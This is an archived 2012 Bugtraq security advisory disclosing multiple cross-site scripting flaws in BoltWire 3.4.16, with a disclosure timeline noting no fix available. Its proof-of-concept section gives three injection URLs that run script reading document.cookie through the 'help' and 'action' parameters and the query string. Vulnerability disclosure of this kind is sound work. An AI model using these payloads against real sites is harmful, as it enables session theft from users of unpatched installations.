| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 15 Jan 2012 09:47:23 GMT From: sschurtz@...ksecurity.de To: bugtraq@...urityfocus.com Subject: BoltWire 3.4.16 Multiple XSS vulnerabilities Advisory: BoltWire 3.4.16 Multiple XSS vulnerabilities Advisory ID: SSCHADV2012-001 Author: Stefan Schurtz Affected Software: Successfully tested on BoltWire 3.4.16 Vendor URL: http://www.boltwire.com/ Vendor Status: informed ========================== Vulnerability Description ========================== BoltWire 3.4.16 is prone to multiple XSS vulnerabilities ================== PoC-Exploit ================== http://[target]/bolt/field/index.php?p=main&help='"</script><script>alert(document.cookie)</script> http://[target]/bolt/field/index.php?"</a><script>alert(document.cookie)</script></ http://[target]/bolt/field/index.php?p=main&action='"</a><script>alert(document.cookie)</script></&file=file.jpg ========= Solution ========= - ==================== Disclosure Timeline ==================== 01-Jan-2012 - vendor informed 01-Jan-2012 - vendor feedback 15-Jan-2012 - no fix available ======== Credits ======== Vulnerabilities found and advisory written by Stefan Schurtz. =========== References =========== http://www.darksecurity.de/advisories/2012/SSCHADV2012-001.txt
Powered by blists - more mailing lists